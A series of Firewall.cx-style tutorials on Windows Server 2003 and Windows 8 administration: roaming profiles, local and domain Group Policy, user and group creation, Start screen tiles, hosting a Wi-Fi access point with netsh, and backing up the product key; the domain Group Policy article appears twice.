Windows uses the Profile folder by default to store roaming user profiles. Although you can give this folder a different name, it is traditionally named Profile.

2. Share the Profile folder and give Everyone full control at the share level.

3. Open Control Panel , and then click System icon. The System Properties dialog box appears.

4. Click Advanced tab, and then click Settings under User Profiles section, as shown below:

tk-windows-roaming-profiles-6

 The User Profiles dialog box appears.

 

5. Click the temporary user profile that you had created and then click Copy To, as shown in the Figure below:

tk-windows-roaming-profiles-7

 

Next, the Copy To dialog box appears, as shown below.

6. Type the network path of the Profile folder in the Copy Profile To field.

A folder with the temporary user name will be created automatically under the Profiles folder.

7. Click Change.

tk-windows-roaming-profiles-8

 

8. The Select User or Group dialog box appears.

9. Enter the name of the temporary user that you have created.

10. Click OK four times to close all the windows that you have opened.

11. Open Administrative Tools in the Control Panel and then click Computer Management, as shown in the second screenshot in this article.

12. Click Users folder under Local Users and Groups node, as shown below:

13. Double-click the temporary user account that you had created.

14. The Properties window for the user account appears as shown in the figure below.

15. Click the Profile tab and then type the path of Profile folder that you had created on a network server in the Profile path field:

tk-windows-roaming-profiles-9

 

16. Click OK and then quit the Computer Management snap-in.

This completes the process of creating a roaming user profile. Now when the user logs into any computer in the domain using his/her credentials, a copy of the user profile stored on the network will be copied to that computer with all the latest changes that the user might have made.

Usually, when a number of roaming profiles are enabled in a domain, logging on and off becomes extremely slow. This happens mostly when roaming users save large files on their computers. Each time a user logs off or logs on to a different computer, the large files take a long time to be saved to, and retrieved from, the network.

The solution to this problem is to use Folder Redirection along with roaming user profiles. The Folder Redirection feature allows you to redirect folders such as Application Data, Desktop, My Documents, and Start Menu to a different network location. These folders are typically the ones used to save large files. When Folder Redirection is used, Windows understands that those particular folders do not need to be copied each time a roaming user logs on or off. These folders are only touched by Windows when a user actually tries to open a file from them.

Another solution to control the growing size of user profiles is to create Mandatory User Profiles for the users. However, such profiles are only appropriate when you want to provide identical desktop configurations to all the roaming users. When mandatory user profiles are configured, the users are not allowed to change their profile settings and thus the profile size always remains manageable. To make a roaming user profile mandatory, you need to rename the Ntuser.dat file to Ntuser.man in the user's profile folder (a minimal sketch of this rename is shown below).
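Below is a minimal Python sketch of that rename; the profile share and user folder shown are hypothetical, so substitute your own Profile share path:

# Make a roaming profile mandatory by renaming Ntuser.dat to Ntuser.man.
from pathlib import Path

profile = Path(r"\\memberserver\Profile\jsmith")   # hypothetical user folder
ntuser = profile / "Ntuser.dat"

if ntuser.exists():
    ntuser.rename(profile / "Ntuser.man")
    print("Profile for", profile.name, "is now mandatory.")
else:
    print("Ntuser.dat not found - check the profile path.")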

Article Summary

Roaming user profiles are simply collections of settings and configurations that are stored on a network location for each user. Once you perform some fairly simple configurations, every time a user logs on to a machine in your domain with his domain credentials, that user's settings will follow him and automatically be applied to his log-on session for that particular machine.

This article covered the creation of roaming user profiles in a Windows server active directory.

If you have found the article useful, we would really appreciate you sharing it with others by using the provided services on the top left corner of this article. Sharing our articles takes only a minute of your time and helps Firewall.cx reach more people through such services.

  • Hits: 50280

Configuring Domain Group Policy for Windows 2003

Windows 2003 Group Policies allow the administrators to manage a group of people accessing a resource efficiently. The group policies can be used to control both the users and computers.

They give better productivity to administrators and save their time by allowing them to manage all the users and computers centrally in just one go.

The group policies are of two types, Local Group Policy and Domain-based Group Policy. As the name suggests, the Local Group Policies allow the local administrator to control how all the users of a computer access the resources and features available on the computer. For example, an administrator can remove the Run command from the Start menu. This ensures that users will not find the Run command on that computer.

The Domain-based Group Policies on the other hand allow the domain/enterprise administrators to manage all the users and the computers of a domain/ forest centrally. They can define the settings and the allowed actions for users and computers across sites, domains, and OUs through group policies.

There are more than 2000 pre-created group policy settings available in Windows Server 2003. A default group policy already exists. You only need to modify it by setting values of different policy settings according to your specific requirements. You can also create new group policies to meet your specific business requirements. The group policies allow you to implement:

  • Registry based settings: Allows you to create a policy to administer operating system components and applications.
  • Security settings: Allows you to set security options for users and computers to restrict them to run files based on path, hash, publisher criteria, or URL zone.
  • Software restrictions: Allows you to create a policy that restricts users from running unwanted applications and protects computers against virus and hacking attacks.
  • Software distribution and installation: Allows you to either assign or publish software application to domain users centrally with the help of a group policy.
  • Automation of tasks using computer and User Scripts
  • Roaming user profiles: Allow mobile users to see a familiar and consistent desktop environment on all the computers of the domain by storing their profile centrally on a server.
  • Internet Explorer maintenance: Allow administrators to manage the IE settings of the user's computers in a domain by setting the security zones, privacy settings, and other parameters centrally with the help of group policy.

Configuring a Domain-Based Group Policy

Just as you used the group policy editor to create a local computer policy, to create a domain-based group policy you need to use the Active Directory Users and Computers snap-in, from where you can open the Group Policy Object Editor.

Follow the steps below to create a domain-based group policy

1. Select Active Directory Users and Computers tool from the Administrative Tools.

2. Expand Active Directory Users and Computers node, as shown below.

3. Right-click the domain name and select Properties from the menu that appears:

tk-windows-gp-domain-1

The properties window of the domain appears.

4. Click the Group Policy tab.

5. The Group Policy tab appears with a Default Domain Policy already created in it, as shown in here:

tk-windows-gp-domain-2

 

You can edit the Default Domain Policy or create a new policy. However, it is not recommended to modify the Default Domain Policy for regular settings.

We will create a new policy instead. Click New to create a new group policy object. A new group policy object appears below the Default Domain Policy in the Group Policy tab, as shown below:

tk-windows-gp-domain-3

 

Once you rename this group policy, you can either double-click on it, or select it and click Edit.

You'll next be presented with the Group Policy Object Editor from where you can select the changes you wish to apply to the specific Group Policy:

tk-windows-gp-domain-4

 

In this example, we have selected to Remove Run menu from Start Menu as shown above. Double-click on the selected setting and the properties of the settings will appear. Select Enabled to enable this setting. Clicking on Explain will provide plenty of additional information to help you understand the effects of this setting.

tk-windows-gp-domain-5

When done, click on OK to save the new setting.

Similarly you can set other settings for the policy. After setting all the desired options, close the Group Policy Object Editor. Your new group policy will take effect.

Article Summary

Domain Group Policies give the administrator great control over domain users by enhancing security levels and restricting access to specific areas of the operating system. These policies can be applied to every organisational unit, group or user in Active Directory, or selectively to the areas you need. This article showed you how to create a domain group policy that can then be applied as required.

If you have found the article useful, we would really appreciate you sharing it with others by using the provided services on the top left corner of this article. Sharing our articles takes only a minute of your time and helps Firewall.cx reach more people through such services.

Windows 2003 Group Policies allow the administrators to manage a group of people accessing a resource efficiently. The group policies can be used to control both the users and computers.

They give better productivity to administrators and save their time by allowing them to manage all the users and computers centrally in just one go.

The group policies are of two types, Local Group Policy and Domain-based Group Policy. As the name suggests, the Local Group Policies allow the local administrator to manage all the users of a computer to access the resources and features available on the computer. For example an administrator can remove the use of Run command from the start menu. This will ensure that the users will not find Run command on that computer.

The Domain-based Group Policies on the other hand allow the domain/enterprise administrators to manage all the users and the computers of a domain/ forest centrally. They can define the settings and the allowed actions for users and computers across sites, domains, and OUs through group policies.

There are more than 2000 pre-created group policy settings available in Windows Server 2003/ Windows XP. A default group policy already exists. You only need to modify it by setting values of different policy settings according to your specific requirements. You can also create new group policies to meet your specific business requirements. The group policies allow you to implement:

Registry based settings : Allows you to create a policy to administer operating system components and applications.

Security settings : Allows you to set security options for users and computers to restrict them to run files based on path, hash, publisher criteria, or URL zone.

Software restrictions : Allows you to create a policy that would restrict users to run unwanted applications and protect computers against virus and hacking attack.

Software distribution and installation : Allows you to either assign or publish software application to domain users centrally with the help of a group policy.

Automation of tasks using computer and User Scripts

Roaming user profiles : Allow mobile users to see a familiar and consistent desktop environment on all the computers of the domain by storing their profile centrally on a server.

Internet Explorer maintenance : Allow administrators to manage the IE settings of the user's computers in a domain by setting the security zones, privacy settings, and other parameters centrally with the help of group policy.





Configuring a Domain-Based Group Policy

Just as you used the Group Policy Object Editor to create a local computer policy, to create a domain-based group policy you need to use the Active Directory Users and Computers snap-in, from where you can open the Group Policy settings of your domain.



Follow the steps below to create a domain-based group policy:

1. Select the Active Directory Users and Computers tool from the Administrative Tools.
2. Expand the Active Directory Users and Computers node, as shown below.
3. Right-click the domain name and select Properties from the menu that appears.





The properties window of the domain appears.

4. Click the Group Policy tab.
5. The Group Policy tab appears with a Default Domain Policy already created in it, as shown here:



You can edit the Default Domain Policy or create a new policy. However, it is not recommended to modify the Default Domain Policy for regular settings.

We will select to create a new policy instead. Click New to create a new group policy or group policy object. A new group policy object appears below the Default Domain Policy in the Group Policy tab, as shown below:



Once you rename this group policy, you can either double-click on it, or select it and click Edit.

You'll next be presented with the Group Policy Object Editor from where you can select the changes you wish to apply to the specific Group Policy:



In this example, we have selected to Remove Run menu from Start Menu as shown above. Double-click on the selected setting and the properties of the setting will appear. Select Enabled to enable this setting. Clicking on Explain will provide plenty of additional information to help you understand the effects of this setting.

tk-windows-gp-domain-5

When done, click on OK to save the new setting.

Similarly, you can configure other settings for the policy. After setting all the desired options, close the Group Policy Object Editor. Your new group policy will take effect.
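Clients normally pick up new domain group policies at the next periodic refresh, reboot or logon. If you want to test the policy immediately on a Windows XP or Windows Server 2003 client, you can force a refresh from a command prompt with the gpupdate tool; a minimal example, assuming you run it on the client whose policy you want refreshed:

C:\> gpupdate /force

The /force switch reapplies all policy settings rather than only the ones that changed since the last refresh.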



Article Summary

Domain Group Policies give administrators great control over their domain users by enhancing security levels and restricting access to specific areas of the operating system. These policies can be applied to every organizational unit, group or user in Active Directory, or selectively to the areas you need. This article showed you how to create a domain group policy that can then be applied as required.




About the writers

GFI Software provides the single best source of network security, content security and messaging software for small to medium sized businesses.

Alan Drury is a member of the Firewall.cx team and a senior engineer at a large multinational company, supporting complex, large Windows networks.

Chris Partsenidis is a CCNA certified Engineer, MCP, LCP, Founder & Senior Editor of Firewall.cx


Configuring Local Group Policy for Windows 2003

Windows 2003 Group Policies allow the administrators to efficiently manage a group of people accessing a resource. Group policies can be used to control both the users and the computers.

They give better productivity to administrators and save their time by allowing them to manage all the users and computers centrally in just one go.

Group policies are of two types, Local Group Policy and Domain-based Group Policy. As the name suggests, Local Group Policies allow the local administrator to manage all the users of a computer and control their access to the resources and features available on that computer. For example, an administrator can remove the Run command from the Start menu. This will ensure that users will not find the Run command on that computer.

Domain-based Group Policies allow the domain / enterprise administrators to manage all the users and the computers of a domain / forest centrally. They can define the settings and the allowed actions for users and computers across sites, domains and OUs through group policies.

There are more than 2000 pre-created group policy settings available in Windows Server 2003 / Windows XP. A default group policy already exists. You only need to modify the values of different policy settings according to your specific requirements. You can create new group policies to meet your specific business requirements. Group policies allow you to implement:

Registry based settings: Allows you to create a policy to administer operating system components and applications.

Security settings: Allows you to set security options for users and computers and restrict them from running files based on path, hash, publisher criteria or URL zone.

Software restrictions: Allows you to create a policy that restricts users from running unwanted applications and protects computers against virus and hacking attacks.

Software distribution and installation: Allows you to either assign or publish software applications to domain users centrally with the help of a group policy.

Roaming user profiles: Allows mobile users to see a familiar and consistent desktop environment on all the computers of the domain by storing their profile centrally on a server.

Internet Explorer maintenance: Allows administrators to manage the IE settings of the users' computers in a domain by setting the security zones, privacy settings and other parameters centrally with the help of group policy.

Using Local Group Policy

Local Group Policies affect only the users who log in to the local machine, while domain-based policies affect all the users of the domain. If you are creating domain-based policies, you can create a policy at three levels: sites, domains and OUs. Also keep in mind that each computer can belong to only one domain and only one site.

A Group Policy Object (GPO) is stored on a per domain basis. However, it can be associated with multiple domains, sites and OUs and a single domain, site or OU can have multiple GPOs. Besides this, any domain, site or OU can be associated with any GPO across domains.

When a GPO is defined it is inherited by all the objects under it and is applied in a cumulative fashion successively starting from local computer to site, domain and each nested OU. For example if a GPO is created at domain level then it will affect all the domain members and all the OUs beneath it.

After applying all the policies in hierarchy, the end result of the policy that takes effect on a user or a computer is called the Resultant Set of Policy (RSoP).
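On Windows XP and Windows Server 2003 you can view the RSoP for the machine you are currently logged on to with the gpresult command-line tool. A brief example (the exact output will depend on the policies in your environment):

C:\> gpresult /scope user

Use /scope computer to see the computer portion of the policy instead, or add /v for a more verbose listing.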

To use GPOs with greater precision, you can apply Windows Management Instrumentation (WMI) filters and Discretionary Access Control List (DACL) permissions. The WMI filters allow you to apply GPOs only to specific computers that meet a specific condition. For example, you can apply a GPO to all the computers that have more than 500 MB of free disk space. The DACL permissions allow you to apply GPOs based on the user's membership in security groups.
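As a rough sketch of the 500 MB example above, the condition in a WMI filter is written as a WQL query; 524288000 is 500 MB expressed in bytes and the query below is purely illustrative. The wmic command underneath it can be run on a workstation to see which local disks would match the same condition:

SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3 AND FreeSpace > 524288000

C:\> wmic logicaldisk where "DriveType=3 and FreeSpace>524288000" get DeviceID,FreeSpace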

Windows Server 2003 provides a GPMC (Group Policy Management Console) that allows you to manage group policy implementations centrally. It provides a unified view of local computer, sites, domains and OUs (organizational units). You can have the following tools in a single console:

  • Active Directory Users and Computers
  • Active Directory Sites and Services
  • Resultant Set of Policy MMC snap-in
  • ACL Editor
  • Delegation Wizard

The screenshot below shows these tools in a single console.

tk-windows-gp-local-1

 

A group policy can be configured for computers or users or both, as shown here:

tk-windows-gp-local-2

The Group Policy editor can be run using the gpedit.msc command.

Both the policies are applied at the periodic refresh of Group Policies and can be used to specify the desktop settings, operating system behavior, user logon and logoff scripts, application settings, security settings, assigned and published applications options and folder redirection options.

Computer-related policies are applied when the computer is rebooted and User-related policies are applied when users log on to the computer.

Configuring a Local Group Policy

To configure a local group policy, you need to access the Group Policy Object Editor. You can use the Group Policy Object Editor by logging in as a local administrator on any member server of a domain or on a workgroup server, but not on a domain controller.

Sometimes this tool, or other Active Directory tools that you need to manage group policy, does not appear in Administrative Tools. In that case you need to follow the steps given below to add the Group Policy Object Editor snap-in to a console.

1. Click Start->Run and type mmc. The Console window appears, as shown below:

2. Select Add/remove Snap-in from the File menu. 

tk-windows-gp-local-3

 

The Add/Remove Snap-in window appears, as shown below:

3. Click Add.

4. The Add Standalone Snap-in window appears.

5. Select Group Policy Object Editor snap-in from the list.

6. Click Add and then click OK in Add/remove Snap-in window.

tk-windows-gp-local-4

 

The Select Group Policy Object window appears, as shown below:

7. Keep the default value “Local Computer”.

8. Click Finish.

tk-windows-gp-local-5

 

The Local Computer Policy MMC appears, as shown below.

You can now set the Computer Configuration or User Configuration policies as desired. This example uses a User Configuration setting.

9. Expand User Configuration node:

tk-windows-gp-local-6

 

10. Expand Administrative Templates and then select the Start Menu and Taskbar node, as shown in Figure 7.

11. Double-click the settings for the policy that you want to modify from the right panel. In this example double-click Remove Run Menu from Start Menu.

tk-windows-gp-local-7

 

The properties window of the setting appears as shown in the below screenshot:

12. Click Enabled to enable this setting.

tk-windows-gp-local-8

Once you click on 'OK', the local policy that you have applied will take effect and all users who log on to this computer will no longer be able to see the Run menu item in the Start menu.

This completes our Local Group Policy configuration section. The next section covers Domain Group Policies, which will help you configure and control user access throughout the Active Directory domain.

Article Summary

Group Policies are an Administrator's best friend. They can control every aspect of a user's desktop, providing enhanced security measures and restricting access to specified resources. Group policies can be applied to a local server, as shown in this article, or to a whole domain.


 


Creating Windows Users and Groups with Windows 2003

In a Windows server environment, it is very important that only authenticated users are allowed to log in for security reasons. To fulfill this requirement the creation of User accounts and Groups is essential.

User Accounts

On Windows Server 2003 computers there are two types of user accounts: local user accounts and domain user accounts. Local user accounts are single user accounts created locally on a Windows Server 2003 computer to allow a user to log on to that computer. Local user accounts are stored in the Security Accounts Manager (SAM) database locally on the hard disk and allow you to access local resources on the computer.

On the other hand, domain user accounts are created on domain controllers and are saved in Active Directory. These accounts allow you to access resources anywhere on the network. On a Windows Server 2003 computer that is a member of a domain, you need a local user account to log in locally on the computer and a domain user account to log in to the domain. Although you can have the same login and password for both accounts, they are still entirely different account types.

You automatically become a local administrator on your computer because the local Administrator account is created when the server is installed. A domain administrator is also a local administrator on all the member computers of the domain because, by default, domain administrators are added to the local Administrators group of every computer that joins the domain.

This article discusses creating local as well as domain user accounts, creating groups and then adding members to groups.

Creating a Local User Account

To create a local user account, you need to:

1. Log on as Administrator, or as a member of the local Administrators group, or of the Account Operators group in the domain.

2. Open Administrative Tools in the Control Panel and then click Computer Management, as shown in Figure 1.

tk-windows-user-groups-1

Figure 1

 

3. Click Users folder under Local Users and Groups node, as shown in Figure 2.

tk-windows-user-groups-2

Figure 2

4. Right-click Users and then click New User in the menu that appears, as shown in Figure 3:

tk-windows-user-groups-3

Figure 3

The New User dialog box appears as shown below in Figure 4.

5. Provide the User name and the Password for the user in their respective fields.

6. Select the desired password settings requirement.

Select the User must change password at next logon option if you want the user to change the password when the user first logs in to the computer. Select the User cannot change password option if you do not want the user to be able to change the password. Select the Password never expires option if you do not want the password to expire after a number of days. Select Account is disabled to disable this user account.

7. Click Create, and then click Close:

tk-windows-user-groups-4

 Figure 4

The user account will appear in the right panel of the window when you click the Users node under Local Users and Groups.
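For completeness, the same kind of local account can also be created from a command prompt with the built-in net user command. The sketch below is only an example; the user name jsmith, the password and the full name are hypothetical placeholders:

C:\> net user jsmith MyP@ssw0rd1 /add /fullname:"John Smith"
C:\> net user jsmith

The second command simply displays the properties of the newly created account so you can confirm it exists.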

You can now associate the user to a group. To associate the user to a group, you need to:

8. Click Users folder under Local Users and Groups node.

9. Right-click the user and then select Properties from the menu that appears, as shown in Figure 5:

tk-windows-user-groups-5

 Figure 5

The Properties dialog box of the user account appears, as shown in Figure 6:

10. Click Member of tab.

The group(s) with which the user is currently associated appears.

11. Click Add.

tk-windows-user-groups-6

 Figure 6

The Select Groups dialog box appears, as shown in Figure 7.

12. Select the name of the group/object that you want the user to associate with from the Enter the object names to select field.

If the group/object names do not appear, you can click the Advanced button to find them. Also, if you want to choose different locations on the network or verify the names you have typed, click the Locations or Check Names buttons.

13. Click OK .

tk-windows-user-groups-7

Figure 7

The selected group will be associated with the user and will appear in the Properties window of the user, as shown in Figure 8:

tk-windows-user-groups-8

Figure 8
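If you prefer the command line, local group membership can also be changed with the net localgroup command. A brief example, again using the hypothetical jsmith account and the built-in Backup Operators group:

C:\> net localgroup "Backup Operators" jsmith /add
C:\> net localgroup "Backup Operators"

The second command lists the members of the group so the change can be verified.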

Creating a Domain User Account

The process of creating a domain user account is more or less similar to the process of creating a local user account. The only differences are a few different options in the same type of screens and a few additional steps in between.

For example, you need the Active Directory Users and Computers MMC (Microsoft Management Console) to create domain user accounts instead of the Local Users and Groups snap-in. Also, when you create a user in a domain, the domain is associated with the user by default; however, you can change the domain if you want.

Finally, although a domain user account can be created in the Users container, it is always better to create it in the desired Organizational Unit (OU).

To create a domain user account follow the steps given below:

1. Log on as Administrator and open Active Directory Users and Computers MMC from the Administrative Tools in Control Panel, as shown in Figure 9.

2. Expand the OU in which you want to create a user, right-click the OU and select New->User from the menu that appears.

tk-windows-user-groups-9

 Figure 9

3. Alternatively, you can click on Action menu and select New->User from the menu that appears.

The New Object –User dialog box appears, as shown in Figure 10.

4. Provide the First name, Last name, and Full name in their respective fields.

5. Provide a unique logon name in User logon name field and then select a domain from the dropdown next to User logon name field if you want to change the domain name.

The domain and the user name that you have provided will appear in the User logon name (pre-Windows 2000) field to ensure that the user is allowed to log on to domain computers that are using earlier versions of Windows such as Windows NT.

tk-windows-user-groups-10

Figure 10

6. Click Next.

The second screen of New Object –User dialog box appears similar to Figure 4.

7. Provide the User name and the Password in their respective fields.

8. Select the desired password settings requirement:

Select the User must change password at next logon option if you want the user to change the password when the user first logs in to the computer. Select the User cannot change password option if you do not want the user to be able to change the password. Select the Password never expires option if you do not want the password to expire after a number of days. Select Account is disabled to disable this user account.

9. Click Next.

10. Verify the user details that you had provided and click Finish on the third screen of New Object –User dialog box.

11. Follow steps 9-13 in the Creating a Local User Account section to associate the user with a group.
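Windows Server 2003 also includes the dsadd command-line tool, which can create a similar domain account in a single line. The sketch below is a hedged example only; the Sales OU, the firewall.cx domain name and the user details are hypothetical and should be replaced with your own values:

C:\> dsadd user "CN=John Smith,OU=Sales,DC=firewall,DC=cx" -samid jsmith -upn jsmith@firewall.cx -fn John -ln Smith -pwd MyP@ssw0rd1 -mustchpwd yes

The -mustchpwd yes switch corresponds to the User must change password at next logon option described in step 8.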

Creating Groups

Just like user accounts, groups on a Windows Server 2003 system are also of two types: built-in local groups and built-in domain groups. Examples of built-in domain groups are Account Operators, Administrators, Backup Operators, Network Configuration Operators, Performance Monitor Users and Users. Similarly, some built-in local groups are Administrators, Users, Guests and Backup Operators.

The built-in groups are created automatically when the operating system is installed and become a part of a domain. However, sometimes you need to create your own groups to meet your business requirements. Custom groups allow you to limit access to resources on a network as per your business requirements. To create custom groups in a domain, you need to:

1. Log on as Administrator and open Active Directory Users and Computers MMC from the Administrative Tools in Control Panel, as shown in Figure 9.

2. Right-click the OU and select New->Group from the menu that appears.

The New Object – Group dialog box appears, as shown in Figure 11.

3. Provide the name of the group in the Group name field.

The group name that you have provided will appear in the Group name (pre-Windows 2000) field to ensure that the group is functional on domain computers that are using earlier versions of Windows such as Windows NT.

4. Select the desired group scope of the group from the Group scope options.

If the Domain Local scope is selected, the members can come from any domain but they can access resources only in the local domain.

If the Global scope is selected, the members can come only from the local domain but they can access resources in any domain.

If the Universal scope is selected, the members can come from any domain and they can access resources in any domain.

5. Select the group type from the Group Type options.

The group type can be Security or Distribution. Security groups are used to assign permissions to access resources, whereas Distribution groups are used for non-security related tasks such as sending emails to all the group members.

tk-windows-user-groups-11

Figure 11

6. Click OK.

You can add members to a group just as you add groups to members. Simply right-click the group under the Active Directory Users and Computers node in the Active Directory Users and Computers snap-in, select Properties, click the Members tab in the group's Properties window and then follow steps 11-13 from the Creating a Local User Account section.
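As with user accounts, groups can also be created and populated from the command line on Windows Server 2003. A short sketch, reusing the hypothetical Sales OU and firewall.cx domain from the earlier example:

C:\> dsadd group "CN=Sales Managers,OU=Sales,DC=firewall,DC=cx" -scope g -secgrp yes
C:\> dsmod group "CN=Sales Managers,OU=Sales,DC=firewall,DC=cx" -addmbr "CN=John Smith,OU=Sales,DC=firewall,DC=cx"

The first command creates a global security group; the second adds the John Smith account created earlier to it.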

Article Summary

Dealing with User & Group accounts in a Windows Server environment is a very important everyday task for any Administrator. This article covered basic administration of user and group accounts in both local and domain environments.


How to Add and Remove Applications from Windows 8 / 8.1 Start Screen

In this article, we'll show you how to add (pin) and remove (unpin) any application from the Windows 8 or Windows 8.1 Metro Start Screen. Tiles, the small squares and rectangles appearing on the Windows 8 Metro Start Screen, represent different programs that you can access by either tapping or clicking on them. The Windows Metro Start screen contains its default tiles, however users have the ability to add or remove tiles (application shortcuts) to meet their requirements. Adding tiles to the Metro Start screen is called pinning, while removing them from the Metro Start screen is called unpinning.

Pinning Apps & Programs To The Windows 8 Metro Start Screen

To pin a Windows application or a Metro App to the Start screen, you have to find it first. For this, tap/click on the Search icon and type the name of the application or the program that you wish to add.

For example, type “Paint” to search for the Windows Paint application as shown below. Once found tap/click on the Apps option:

windows-8-add-remove-application-from-start-screen-01
Figure 1. Searching for Application

Search will come up with the search result for the Paint program, as indicated on the left of the screen. Right-click on the search result or hold your finger on it until a check mark appears beside it and a panel opens up at the bottom of the screen:

windows-8-add-remove-application-from-start-screen-02
Figure 2. Pinning the Application on Windows 8

The panel offers two options for pinning – Pin to taskbar and Pin to Start. If you would like to see the icon of the application on the taskbar of your Windows Desktop, you can tap/click on Pin to taskbar. For this article we want to pin it to the Metro Start screen, so tap/click on Pin to Start.

The bottom panel now disappears and you can open the application from the icon on the screen. If instead you would like to go back to the Start screen, click on the bottom left hand corner or swipe in from the right edge of the screen and then tap/click on the Start icon. Verify that the application icon has appeared on the Metro Start screen:

windows-8-add-remove-application-from-start-screen-03 
Figure 3. Pinned Application on Windows Metro Start Screen

Unpinning Apps & Programs From The Windows 8 Metro Start Screen

To unpin an application from the Windows Metro Start screen, right-click on its tile or hold your finger on it until a check mark appears beside it and a panel opens up at the bottom of the screen:

windows-8-add-remove-application-from-start-screen-04
Figure 4. Unpin an Application from Windows Metro Start Screen

Tap/click on Unpin from Start and the icon of the selected program will vanish from the screen along with the panel.

Alternate Way To Pin Or Unpin Apps & Programs On The Windows 8 Metro Start Screen

There is another way by which you can pin/unpin most programs on the Windows 8 Metro Start screen.

Windows may not be able to find every program when you search for it. However, Windows 8 provides a very easy method for looking at all the programs available in your system on one screen. You can then decide which ones you want to pin as tiles on the Metro Start screen.

On the Metro Start screen, tap/right-click on any empty space (not covered by any tile) - a bar will appear at the bottom of the screen. Tap/click on the only icon in the bar: All apps. A new Apps screen will open up showing icons of all the apps and programs available in your computer, neatly divided into groups.

windows-8-add-remove-application-from-start-screen-05 
Figure 5. All Apps Windows 8/8.1 Screen

Right-click on any icon or hold your finger on it until a check mark appears beside it and a panel opens up at the bottom of the screen, as in Figure 2.

Now you can choose to pin the app to the Start screen or the Task Bar. Moreover, if the app is already pinned, the panel will allow you to unpin it. Continue doing this to all the apps you want on the Start screen.
Once you are done, tap/click on the All apps icon and you will be back in the Metro Start screen along with all the application tiles you had selected.

In conclusion, this article showed how to add (pin) or remove (unpin) the tiles (the small squares and rectangles appearing on the Windows 8 Metro Start Screen) to suit our requirements. More articles on Windows 8 & Windows 8.1 can be found in our Windows Workstation section.


Configure Windows 8 & 8.1 To Provide Secure Wireless Access Point Services to Wi-Fi Clients - Turn Windows 8 into an Access Point

windows-8-secure-access-point-1-preWindows 8 and Windows 8.1 (including Professional edition) operating systems provide the ability to turn your workstation or laptop into a secure wireless access point, allowing wireless clients (including mobile devices) to connect to the local network or Internet. This feature can save you time, money and frustration when there is a need to connect wireless devices to the network or Internet but no access point is available.

In addition, using the method described below, you can turn your Windows system into a portable 3G router by connecting your workstation to your 3G provider (using your USB HSUPA/GPRS stick).

Windows 7 users can visit our article Configuring Windows 7 To Provide Secure Wireless Access Point Services to Wi-Fi Clients - Turn Windows into an Access Point

To begin, open your Network Connections window by pressing Windows Key + R combination to bring up the Run window, and type ncpa.cpl and click OK:

windows-8-secure-access-point-1
Figure 1. Run Command – Network Connections

The Network Connections window will appear, displaying all network adapters the system currently has installed:

windows-8-secure-access-point-2
Figure 2. Network Connections

Let’s now create our new wireless virtual adapter that will be used as an access point for our wireless clients. To do this, open an elevated Command Prompt (cmd) by right-clicking on the Windows 8 start button located in the lower left corner of the desktop and selecting Command Prompt (Admin). If prompted by the User Account Control protection, simply click on Yes to proceed:

windows-8-secure-access-point-3
Figure 3. Opening an elevated Command Prompt

Once the command prompt is open, enter the following command to create the wireless network (SSID). The encryption used by default is WPA2-PSK/AES:

C:\windows\system32> netsh wlan set hostednetwork mode=allow ssid=Firewall.cx key=$connect$here

When the command is entered, the system will return the following information:

The hosted network mode has been set to allow.
The SSID of the hosted network has been successfully changed.
The user key passphrase of the hosted network has been successfully changed.

In our example, the Wi-Fi (SSID) is named Firewall.cx and has a password of $connect$here.
 
The system information above confirms the creation of the wireless network and creates our virtual adapter which will be visible in the Network Connection window after the virtual adapter is enabled with the following command:

C:\windows\system32> netsh wlan start hostednetwork

Again, the system will confirm the wireless network has started with the below message:

The hosted network started.

Looking at the Network Connection window we’ll find our new adapter labeled as Local Area Connection 4. Right under the adapter is the SSID name of the wireless network created by the previous command:

windows-8-secure-access-point-4
Figure 4. Network Connections – Our new adapter appears

At this point, our new wireless network (Firewall.cx) should be visible to all nearby wireless clients.

Next, we need to enable Internet sharing on the network adapter that has Internet access. In our case this is the Ethernet adapter. Users accessing the Internet via their mobile broadband adapter should select their broadband adapter instead.

To enable Internet sharing, right-click on the Ethernet network adapter and select properties from the context menu, as shown below:

windows-8-secure-access-point-5Figure 5. Network Connections – Ethernet Adapter Properties

Once the Ethernet adapter properties window appears, select the Sharing tab and tick the Allow other network users to connect through this computer’s Internet connection then select the newly created virtual adapter labelled Local Area Connection 4:

windows-8-secure-access-point-6Figure 6. Enabling sharing and selecting the newly created virtual adapter

Be sure to untick the second option below (not clearly visible in above screenshot): Allow other network users to control or disable the shared Internet connection, then click on OK.

Notice our Ethernet adapter now has the word Shared in its description field:

windows-8-secure-access-point-7
Figure 7. Our Ethernet adapter now appears to be shared

At this point, clients that have successfully connected to our wireless SSID Firewall.cx should have Internet access.

Note that in some cases, it might be required to perform a quick restart of the operating system before wireless clients have Internet access. Remember that in case of a system restart, it is necessary to enter all command prompt commands again.
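Since the hosted network does not persist across reboots, the two commands can be saved in a small batch file and run (as Administrator) whenever needed. This is only a sketch based on the commands used above; adjust the SSID and key to your own values:

rem start-hotspot.bat - re-creates and starts the hosted network after a reboot
netsh wlan set hostednetwork mode=allow ssid=Firewall.cx key=$connect$here
netsh wlan start hostednetwork

To take the access point down again, use netsh wlan stop hostednetwork.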

The command below will help verify the wireless clients connected to our Windows 8 access point:

C:\windows\system32> netsh wlan show hostednetwork
windows-8-secure-access-point-8
Figure 8. Information on our Windows 8 access point

As shown above, we have one wireless client connected to our Windows 8 access point. Windows 8 will support up to 100 wireless clients, even though that number is extremely unlikely to ever be reached.

This article showed how to turn your Windows 8 & Windows 8.1 operating system into a wireless access point, allowing wireless clients to connect to the Internet or Local LAN.


Revealing & Backing Up Your Windows 8 – Windows 8.1 Pro License Product Key

windows-8-backup-license-product-key-1aBacking up your Windows License Product Key is essential for reinstallation of your Windows 8 or Windows 8.1 operating system. In some cases, the Genuine Microsoft Label or Certificate Of Authenticity (COA) containing the product key is placed in an area not easily accessible by users, e.g. inside the battery compartment of newer ultrabooks/laptops, making it difficult to note the product key.

In this article, we’ll show you how to easily download and store your Windows License Product Key inside a text file with just two clicks!

The information displayed under the System Information page in Windows 8 and Windows 8.1 (including professional editions), includes the Windows edition, system hardware (CPU, RAM), Computer name and Windows activation status. The Windows activation status section shows us if the product is activated or not, along with the Product ID:

windows-8-backup-license-product-key-1

Figure 1. System Information does not show the Product Key

Product Keys and Product IDs are two completely different things, despite the similarity of the terms.

The 20-character Product ID is created during the installation process and is used to obtain/qualify for technical support from Microsoft; it cannot be used to install the product.

To reveal your Product Key, which is the 25-character key used during the installation process, simply download and execute the script provided on the second page of our Administrative Utilities Download section.

Once you have downloaded and unzipped the file, double-click on the Windows Key.vbs file to execute the script. Once executed, a popup window will display your Product Name, Product ID and hidden Product Key:

